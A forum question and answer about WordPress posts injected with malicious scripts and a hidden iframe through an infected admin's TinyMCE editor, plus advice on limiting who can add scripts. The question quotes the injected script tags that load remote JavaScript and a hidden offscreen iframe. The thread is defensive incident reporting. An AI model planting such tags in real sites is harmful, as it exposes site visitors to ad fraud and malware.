A client of mine has just had 200 posts injected by malicious scripts and iframes. The website is now all cleared.
They were put in the content by the user updating the post/page as my clients computer was infected. (Though only in the TinyMCE editor – not any of the other custom fields assigned to the particular page/posts)
The exact scripts for this website looked like the ones below:
<script src="https://serverads.net/599b47260394deb2d8.js"></script>
<script src="https://pulseadnetwork.com/a/display.php?r=1131815"></script>
<script src="http://serverads.net/addons/lnkr5.min.js" type="text/javascript"></script>
The iframes looked like this:
<iframe style="position: absolute; left: -1000px; top: -1000px; width: 1px; height: 1px; visibility: hidden; border: none; background-color: transparent;" src="https://pulseadnetwork.com/pix.html"></iframe>
To prevent this from happening in the future, is it possible to completely disable/disallow scripts and iframes put in the TinyMCE in WordPress?
WordPres version: 4.4.2
And yes, I know – this won’t fix my clients computer. But hoping that it most certainly will prevent the malicious code from populating the TinyMCE editor and spamming my clients website visitors in the future.
1 Answer
Simple way, do not add content when logged in as admin user but only as author. If you want to go to somewhat extreme, remove the posting capabilities from the admin. Not sure where that will leave you with editing slugs so a proper check of permission will be needed.
This answers your question as author user are not allowed to add scripts and iframes into content, but….. if the computer of the person with the admin permissions is not secure, then you are doomed whatever you do as the hacker can use the login to give himself whatever permissions he likes, even just do DB level changes without even going via the WP APIS.
